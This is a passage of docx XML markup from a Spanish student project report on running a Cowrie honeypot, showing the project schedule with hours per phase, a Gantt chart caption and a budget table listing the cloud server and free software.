                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Completada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Instalación y configuración de Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10 oct – 14 oct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Completada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Captura de datos (exposición a Internet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">14 oct – 7 nov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">En curso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Análisis con Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7 nov – 16 nov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Script listo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Informe de inteligencia (CTI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">16 nov – 23 nov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Pendiente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Memoria y entrega final</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">23 nov – 14 dic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Pendiente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">109</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagrama de Gantt del proyecto (septiembre–diciembre 2026)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5038725" cy="22193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38725" cy="2219325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota. Las barras representan el periodo de cada fase y su carga estimada en horas. Los rombos marcan el hito de control del 50 % (9 de octubre) y la entrega final (14 de diciembre).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Presupuesto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El proyecto utiliza únicamente software libre o gratuito; el único coste es el servidor cloud:</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969"/>
        <w:gridCol w:w="1985"/>
        <w:gridCol w:w="1985"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Concepto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Coste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Servidor Hetzner Cloud CX23 + IPv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7,25 €/mes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">IVA incluido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Software Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Open source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Python 3 + bibliotecas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Open source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Wazuh SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
